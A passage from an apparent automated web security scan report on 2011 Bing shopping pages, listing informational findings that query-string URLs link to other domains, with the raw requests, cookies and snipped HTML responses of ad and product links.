<h3><a href="http://731936.r.msn.com/?ld=4vKOXhALU_i6EayRSIDZjx0zxyHVMT_KpQ4_QSqJ8HcF9j_lWqz_ETzmnrTSU2Ob3ofNi3QxNa2PxSOfidk6UacrDbWWQg8HtdYz-HWECQeNYNVvnSdYGk_JBwD89zXixom9dFZnZRUGnXM0k7Ln_rbNutLjAAp2cscjZzOQL-6lC4yTzfXdvE5yWaHGjeF1S_FRYUx_0vIA1ky-9jbX6AmPOK0rS2Qce46HKkXIIVNQQelVWSge_IANHZOmJJCl10B_g2ov4xLjpWDNuMsHlYePtNTjgDBTBj7SbJveg1hcg1VAlMbTsv_GO2OeAlOF4erVH8vhAmY3M99She7M1nrmTVN-n9TjwXZ2cmwkuP1upGxaw_GwWKkio" onmousedown="return si_T('&ID=FD,72.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4vhYz2p829p-yDSlc1rKcrHC3tWKbq9OcLe1noqBr9M8uDF2U859a3PzbtEG4ahyVNRty9v7lct9ewMfhfEn0pdkl7pWuyOrAc5YoGNrT0LIkNY2OkedmQ1j5yxr-x8cNXivnz_8Gnt1Zt1YALHEyZrry2Kz14dj3UzOt70ZLaJKns1aBzJGlEAHthFu5C5W4c_fer4Jpev4YUqU7mecjy1XVvnbQGahrDhb2r_yCJtufU7LFmaj6hUR9YFzkMilYdazUogkyoaE0k1k0wfJlCcvd8W8SJZ3hcZcHDkRZ9C7tSkzmc5EfPgCHrhPoNiI74NVQJTLXg51axKZbsgJzZpyo0LnsQJmNzPe4No5OwpD4gh5NMCib0VcBtf4geJd3upiSgG74-VOZq" onmousedown="return si_T('&ID=FD,74.1,Ads')">Patio & Garden at Amazon</a>
...[SNIP]...
<div><a href="http://advertising.microsoft.com/search/" class="sb_adMktA" onmousedown="return si_T('&ID=FD,56.1,Ads')">See your message here</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,169.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,171.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,173.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,175.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,177.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808574.aspx?scrx=1&market=en-US" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,179.1')">Help</a> | </li><li><a href="https://feedback.discoverbing.com/default.aspx?locale=en-US&productkey=bingshopping&P1=dsatcommerce&P2=squirrel-proof%20bird%20feeders&P3=0&P4=SHOPH1&P5=f741a5d3-c854-4f77-a0b5-7d8439e7e06e&P6=&P7=Original&P8=&P9=0.0/0.0&P10=0.0&P11=http%3a%2f%2fwww.bing.com%3a80%2fshopping%2fbird-feeders%2fsearch%3fq%3dsquirrel-proof%2520bird%2520feeders%26p1%3d%255bCommerceService%2520scenario%253d%2522f%2522%2520r%253d%2522pricelow%257c10%252cpricehigh%257c25%252cleafcategoryid%257c5289%2522%255d%26vw%3dgr%26FORM%3dSHOPH1%26crea%3d012911feedersa&P12=&searchtype=Commerce+Answer&optl1=1&backurl=http%3a%2f%2fwww.bing.com%2fshopping%2fbird-feeders%2fsearch%3fq%3dsquirrel-proof%2520bird%2520feeders%26p1%3d%255bCommerceService%2520scenario%253d%2522f%2522%2520r%253d%2522pricelow%257c10%252cpricehigh%257c25%252cleafcategoryid%257c5289%2522%255d%26FORM%3dFEEDTU" id="sb_feedback" onmousedown="return si_T('&ID=FD,181.1')">Tell us what you think</a>
...[SNIP]...

22.389. http://www.bing.com/shopping/content/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/content/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/shopping/content/search?q=Cocktail+Dresses%3a+Silk+Organza+Strapless+Dress&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_image_jl0125_1x1&gt1=36010

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://adsyndication.msn.com/delivery/getads.js
http://advertising.microsoft.com/advertise-on-bing
http://cc.bingj.com/cache.aspx?q=silk+cocktail+dresses&d=4568303478309094&mkt=en-US&w=5e2b2b96,d0444ac7
http://cc.bingj.com/cache.aspx?q=silk+cocktail+dresses&d=4636314282887850&mkt=en-US&w=3fc633d4,ba9f01b4
http://cc.bingj.com/cache.aspx?q=silk+cocktail+dresses&d=4987462216581666&mkt=en-US&w=476d4f7f,5b7db654
http://clothing-and-accessories.become.com/cocktail-dress-silk
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-US/bing/ff808483.aspx
http://www.bizrate.com/womens-dresses/silk-cocktail-dresses/
http://www.discoverbing.com/get/set-bing-as-your-homepage-2/?&form=SSMKHM
http://www.redacted/
http://www.shopstyle.com/browse?fts=silk+cocktail+dress

Request

GET /shopping/content/search?q=Cocktail+Dresses%3a+Silk+Organza+Strapless+Dress&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_image_jl0125_1x1&gt1=36010 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 33458
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:49 GMT
Connection: close
Set-Cookie: JSESSIONID=701D1EF51F0C0EBBEFA7B584B767B7F3; Path=/shopping
Set-Cookie: _SS=SID=F7223D6786004ADAB84BB9BF5E3B5DE1; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c79fe60b3364d4636b00d1291b84352c7; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org
...[SNIP]...
</script>


<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,57.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,59.1')">Hotmail</a>
...[SNIP]...
<strong><a xmlns="" tabindex="20" href="http://www.discoverbing.com/get/set-bing-as-your-homepage-2/?&form=SSMKHM">Find what you're looking for & more. Make Bing your search engine.</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://www.bizrate.com/womens-dresses/silk-cocktail-dresses/">Silk cocktail dresses Women's Dresses at Bizrate - Shop online for ...</a>
...[SNIP]...
<li>
<a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=silk+cocktail+dresses&d=4636314282887850&mkt=en-US&w=3fc633d4,ba9f01b4">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://clothing-and-accessories.become.com/cocktail-dress-silk">Cocktail Dress Silk - Compare Prices on Cocktail Dress Silk in the ...</a>
...[SNIP]...
<li>
<a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=silk+cocktail+dresses&d=4568303478309094&mkt=en-US&w=5e2b2b96,d0444ac7">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://www.shopstyle.com/browse?fts=silk+cocktail+dress">Silk Cocktail Dress | Shop for Silk Cocktail Dress at ShopStyle</a>
...[SNIP]...
<li>
<a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=silk+cocktail+dresses&d=4987462216581666&mkt=en-US&w=476d4f7f,5b7db654">Cached page</a>
...[SNIP]...
</script>

<script src="http://adsyndication.redacted/delivery/getads.js"
   type="text/javascript">

</script>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,70.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,72.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,74.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,76.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,78.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808483.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,80.1')">Help</a>
...[SNIP]...

22.390. http://www.bing.com/shopping/healthy-cooking/r/151 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/healthy-cooking/r/151

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/shopping/healthy-cooking/r/151?FORM=SHOPH1&crea=012911kitchentools

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://advertising.microsoft.com/advertise-on-bing
http://feedback.discoverbing.com/default.aspx?productkey=bingshopping
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808574.aspx?scrx=1&market=en-US
http://www.redacted/

Request

GET /shopping/healthy-cooking/r/151?FORM=SHOPH1&crea=012911kitchentools HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54539
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:53:16 GMT
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:18 GMT
Connection: close
Set-Cookie: _SS=SID=5EC6D0FB73E14CF2B14310C4952E2ED9; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:17 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c71fd68ffb7b94fdeb981a8ac4eea2a2c; expires=Mon, 28-Jan-2013 23:53:17 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:18 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,40.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,42.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,53.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,55.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,57.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,59.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,61.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808574.aspx?scrx=1&market=en-US" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,63.1')">Help</a> | </li><li><a href="http://feedback.discoverbing.com/default.aspx?productkey=bingshopping" id="sb_feedback" onmousedown="return si_T('&ID=FD,65.1')">Tell us what you think</a>
...[SNIP]...

22.391. http://www.bing.com/shopping/makeup/c/4259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/makeup/c/4259

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/shopping/makeup/c/4259?q=MAC+cosmetics&vw=gr&FORM=SHOPH1&crea=012911cosmetics

The response contains the following links to other domains:

http://0.r.redacted/?ld=4v-pVHW3X-HHAzjSWf2c0jXUiuZjkC4LqZlrcWOo_fSnpwrR7vod0QVhnEU6sOXmAmIZxRmaTkqhru9CDUmYaIsG2wtFEknlkXawIVK-apwgILAwPDsOvre464ZCwF3chYZ9WoyeVOTr0n1x_UcClBmNAsJo0ArWax0ivsGjadd-eNp0XnwlnaWdVF2qYgc9lwz0LZyE1TyUVd8XfRt5Zokue08o4vcTD3ugNsVj6JsIBGy4grMim7_jQsmuwptCj3M7wPgLiMteWj9D9C5wZWc_MMNjLZpzUt3uta6G7gIT29ptzXTttmcwDyQH6ElO9AkPdKnVmwAW2rpA4X5gVuyU9JcQHwoepIyqtfgNGQcYpHeVebCC6z-AZGxl3ix2EXWHI_k3lau8UF8pyZMaIs7TVUCUyPMZLXL7rKYSan0YShdPSGECZjcz1SMciSwI1G7NCwqiI7b7kZkQjgIdwMi1ncBKIdKZjzPA
http://0.r.redacted/?ld=4vEq1DOxCNTgodBnCCN9PUAySR64vGuITELxvcs_yTo45y4ylgr2rq1lxkPSf7WGXnRpOv5AN_Qajv-PHCd_5ICJvWd3Z1WJ5wfY4pjAWOHpvNScraml8jk1Av4p1sfKcvy2G1x7s1iyy4duaWgjwx_mXCCQNZJrsOn3RmwU6BxJmL_z-et1uGujTVCO1noaUHRmokQhH1GNlobeuEUlkjLDiFESeM9txQpGK6juoH6l9iLcVYmbIFRujBvEm6rOz3TZJLIAeWRA49u4yEkwm0W95bfI-Q_HRkYGM9PvkfiFXtdFvralNsqPf6GcjthT8ZNVQJTCMDjqkIonP-9kNcCIQ5bEUQJmNzPYsqJ2mxhhsTlqHQwvkRXK1M5Vy4-BobV9sCDPmuJiae
http://0.r.redacted/?ld=4vGAL1SBCEdXzhb7_ep95MdPncmpfA2k6Eij6vSi3LcXkmFDUBYmOhOz3oOKaqlul4TWYGiqJVOsqlF91hOIQuzTfW9aOu9uWHFodunSQJm2D9mzCoOeR3kP7QEJX_9A7g5ApAnmOTfeYcuyGjZP_rojRwPyAywpOVJhejnobbYbemg0-QniME48PYSdi5A5Bdy9t_l9StTFLAy4xDznfnih9xGvNpMcNQiqwH3TwSHsBu7qQKzXuG8KqiTYpkAYjJgUmKr2qu29vS9IWGnrFDyWItqwrgA0vlz8YQxQYR-hg1VAlMIC1RchNWR6aL_dsgj9gSpRAmY3M9CaLvCTssDq1FWZRAkpGUXlGYhfw---32OKTaNoNhpcQ
http://a1.bing4.com/thumb/get?bid=BoDQeENuUm4Kzw&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a1.bing4.com/thumb/get?bid=DvQHaE80B95yPQ&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a1.bing4.com/thumb/get?bid=LOH2QA%2ftpRffPQ&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a1.bing4.com/thumb/get?bid=PikmQecSAVbEfw&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a2.bing4.com/thumb/get?bid=IIOBHDK6d0R%2bMA&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a2.bing4.com/thumb/get?bid=hWzl%2fEv%2bunl6BA&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a2.bing4.com/thumb/get?bid=jPjlgXSN3zaw9Q&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a2.bing4.com/thumb/get?bid=ng5vIgSQf0dxWA&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a3.bing4.com/getimage?q=big-CA34CB0E3298E212E7FF97C2635E7526&wf=Comimage
http://a3.bing4.com/thumb/get?bid=bt8oRK%2bZJsrvTw&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a3.bing4.com/thumb/get?bid=qTebgBKHxdk97A&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a3.bing4.com/thumb/get?bid=v7WhxKUwdNrBzQ&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a4.bing4.com/thumb/get?bid=DADVssGCuWYaUA&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a4.bing4.com/thumb/get?bid=LBfijkr%2f7kcKkA&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a4.bing4.com/thumb/get?bid=OeJnbv%2bXJmtPgA&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a4.bing4.com/thumb/get?bid=dE62XCcZUKakGg&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://advertising.microsoft.com/advertise-on-bing
http://advertising.microsoft.com/search/
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808574.aspx?scrx=1&market=en-US
http://www.redacted/
https://feedback.discoverbing.com/default.aspx?locale=en-US&productkey=bingshopping&P1=dsatcommerce&P2=MAC%20cosmetics&P3=0&P4=SHOPH1&P5=f741a5d3-c854-4f77-a0b5-7d8439e7e06e&P6=&P7=Original&P8=&P9=0.0/0.0&P10=0.0&P11=http%3a%2f%2fwww.bing.com%3a80%2fshopping%2fmakeup%2fc%2f4259%3fq%3dMAC%2bcosmetics%26vw%3dgr%26FORM%3dSHOPH1%26crea%3d012911cosmetics&P12=&searchtype=Commerce+Answer&optl1=1&backurl=http%3a%2f%2fwww.bing.com%2fshopping%2fmakeup%2fc%2f4259%3fq%3dMAC%2520cosmetics%26FORM%3dFEEDTU

Request

GET /shopping/makeup/c/4259?q=MAC+cosmetics&vw=gr&FORM=SHOPH1&crea=012911cosmetics HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:44 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=C726EB6B9C86452BBDD8A45F549E1925; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:45 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c15d6f002248246d583a9b1d2cb6b22c3; expires=Tue, 29-Jan-2013 17:09:45 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:45 GMT; domain=.bing.com; path=/
Content-Length: 68299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,40.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,42.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4v-pVHW3X-HHAzjSWf2c0jXUiuZjkC4LqZlrcWOo_fSnpwrR7vod0QVhnEU6sOXmAmIZxRmaTkqhru9CDUmYaIsG2wtFEknlkXawIVK-apwgILAwPDsOvre464ZCwF3chYZ9WoyeVOTr0n1x_UcClBmNAsJo0ArWax0ivsGjadd-eNp0XnwlnaWdVF2qYgc9lwz0LZyE1TyUVd8XfRt5Zokue08o4vcTD3ugNsVj6JsIBGy4grMim7_jQsmuwptCj3M7wPgLiMteWj9D9C5wZWc_MMNjLZpzUt3uta6G7gIT29ptzXTttmcwDyQH6ElO9AkPdKnVmwAW2rpA4X5gVuyU9JcQHwoepIyqtfgNGQcYpHeVebCC6z-AZGxl3ix2EXWHI_k3lau8UF8pyZMaIs7TVUCUyPMZLXL7rKYSan0YShdPSGECZjcz1SMciSwI1G7NCwqiI7b7kZkQjgIdwMi1ncBKIdKZjzPA" onmousedown="return si_T('&ID=FD,62.1,Ads')"><strong>
...[SNIP]...
&msclkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&c=795646&mu=http%3a%2f%2fwww.ecrater.com%2fp%2f10246527%2fmac-cosmetics-pigment-blush-25g" onmousedown="return si_T('&ID=commerce,25.1',this)"><img src="http://a4.bing4.com/thumb/get?bid=LBfijkr%2f7kcKkA&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="Mac Cosmetics Pigment Blush 2,5g Vial Museum Bronze New" alt="Mac Cosmetics Pigment Blush 2,5g Vial Museum Bronze New" width="45" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
;msclkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&c=795646&mu=http%3a%2f%2fwww.ecrater.com%2fp%2f5234356%2fmac-cosmetics-glitter-sample-1-2-tsp" onmousedown="return si_T('&ID=commerce,28.1',this)"><img src="http://a1.bing4.com/thumb/get?bid=DvQHaE80B95yPQ&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="MAC Cosmetics Glitter Sample 1/2 Tsp - Reflects Rust Limited Edition" alt="MAC Cosmetics Glitter Sample 1/2 Tsp - Reflects Rust Limited Edition" width="89" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
lkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&c=796804&mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Satin-Lipstick-MYTH--P1476936.aspx" onmousedown="return si_T('&ID=commerce,31.1',this)"><img src="http://a2.bing4.com/thumb/get?bid=hWzl%2fEv%2bunl6BA&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="MAC Cosmetics Satin Lipstick MYTH" alt="MAC Cosmetics Satin Lipstick MYTH" width="100" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
BDEB63BDBD4A6E8DA2353BBCA9DA9C&c=796804&mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Cremesheen-Lipstick-MODESTY--P222394.aspx" onmousedown="return si_T('&ID=commerce,34.1',this)"><img src="http://a3.bing4.com/thumb/get?bid=v7WhxKUwdNrBzQ&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="MAC Cosmetics Cremesheen Lipstick MODESTY" alt="MAC Cosmetics Cremesheen Lipstick MODESTY" width="100" height="97" style="margin-top:34px;" /></a>
...[SNIP]...
kid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&c=796804&mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Satin-Lipstick-MOCHA--P1476946.aspx" onmousedown="return si_T('&ID=commerce,37.1',this)"><img src="http://a4.bing4.com/thumb/get?bid=OeJnbv%2bXJmtPgA&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="MAC Cosmetics Satin Lipstick MOCHA" alt="MAC Cosmetics Satin Lipstick MOCHA" width="98" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
DBD4A6E8DA2353BBCA9DA9C&c=796804&mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-STRANGE-HYBRID-Lipstick-PROPAGATE--P1492127.aspx" onmousedown="return si_T('&ID=commerce,40.1',this)"><img src="http://a1.bing4.com/thumb/get?bid=PikmQecSAVbEfw&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="MAC Cosmetics STRANGE HYBRID Lipstick PROPAGATE" alt="MAC Cosmetics STRANGE HYBRID Lipstick PROPAGATE" width="100" height="87" style="margin-top:39px;" /></a>
...[SNIP]...
;msclkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&c=795646&mu=http%3a%2f%2fwww.ecrater.com%2fp%2f8879189%2fmac-cosmetics-pro-pigment-sample-1-2" onmousedown="return si_T('&ID=commerce,43.1',this)"><img src="http://a2.bing4.com/thumb/get?bid=ng5vIgSQf0dxWA&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="MAC Cosmetics PRO Pigment Sample 1/2 Tsp - Naked Dark" alt="MAC Cosmetics PRO Pigment Sample 1/2 Tsp - Naked Dark" width="78" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
kid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&c=796804&mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Satin-Lipstick-SPIRIT-P1495576.aspx" onmousedown="return si_T('&ID=commerce,46.1',this)"><img src="http://a3.bing4.com/thumb/get?bid=qTebgBKHxdk97A&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="MAC Cosmetics Satin Lipstick SPIRIT" alt="MAC Cosmetics Satin Lipstick SPIRIT" width="100" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
2353BBCA9DA9C&c=796804&mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Slimshine-Lipstick-Moisturizing-TROPIC-GLOW--P1690977.aspx" onmousedown="return si_T('&ID=commerce,49.1',this)"><img src="http://a4.bing4.com/thumb/get?bid=dE62XCcZUKakGg&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="MAC Cosmetics Slimshine Lipstick Moisturizing TROPIC GLOW" alt="MAC Cosmetics Slimshine Lipstick Moisturizing TROPIC GLOW" width="100" height="93" style="margin-top:36px;" /></a>
...[SNIP]...
lkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&c=796804&mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Satin-Lipstick-REBEL-P1493406.aspx" onmousedown="return si_T('&ID=commerce,52.1',this)"><img src="http://a1.bing4.com/thumb/get?bid=BoDQeENuUm4Kzw&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="MAC Cosmetics Satin Lipstick REBEL" alt="MAC Cosmetics Satin Lipstick REBEL" width="100" height="98" style="margin-top:33px;" /></a>
...[SNIP]...
lkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&c=796804&mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Satin-Lipstick-TWIG--P1502946.aspx" onmousedown="return si_T('&ID=commerce,55.1',this)"><img src="http://a2.bing4.com/thumb/get?bid=IIOBHDK6d0R%2bMA&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="MAC Cosmetics Satin Lipstick TWIG" alt="MAC Cosmetics Satin Lipstick TWIG" width="96" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
